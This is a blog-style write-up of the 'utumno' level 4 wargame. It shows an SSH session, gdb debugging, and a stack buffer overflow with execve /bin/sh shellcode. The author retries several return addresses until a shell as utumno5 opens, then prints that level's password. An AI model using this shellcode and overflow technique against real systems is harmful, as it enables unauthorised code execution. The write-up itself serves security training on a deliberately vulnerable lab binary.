utumno - 4
2016-04-13 14:43
399 查看
root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250 utumno4@melinda:~$ cd /tmp/utu4 utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4 (gdb) layout asm (gdb) b *main+108 Breakpoint 1 at 0x80484c9: file utumno4.c, line 36. (gdb) run 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3 \x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'` Starting program: /games/utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x 68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'` Breakpoint 1, main (argc=1431655765, argv=0x55555555) at utumno4.c:36 (gdb) x/8dbx $esp+0x1e 0xfffdd6ce: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
#so we get the buffer address is 0xfffdd6de or 0xfffdd6be
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xce\xd6\xfd\xff" + "U" * 238'` Segmentation fault utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xbe\xd6\xfd\xff" + "U" * 238'` Illegal instruction utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xde\xd6\xfd\xff" + "U" * 238'` $ whoami utumno5 $ cat /etc/utumno_pass/utumno5 woucaejiek $
相关文章推荐
- 软考中高项学员:2016年4月11日作业
- OpenCV的TermCriteria模板类介绍
- Docker 制作Apache+PHP+GD+MongoDB+Redis镜像
- 标准linu休眠和唤醒机制分析(三)
- 线程同步机制synchronized
- C++中extern “C”含义深层探索
- Xcode报错
- LightOJ 1197 Help Hanzo 素数筛
- C#常用正则过滤
- Android - 文件读写操作总结
- NSUserDefaults 的坑知道吗?
- configure: error: failed to find required module google.protobuf
- git clone权限被拒绝
- python hmac-sha1
- iOS 弹出一个透明的控制器
- 64位Linux(ubuntu)安装、运行32位程序
- 【基础语法】a++与++a的区别
- Jquery Ajax示例---load,get,post方法
- 卫语句
- 史上最全Android WebView使用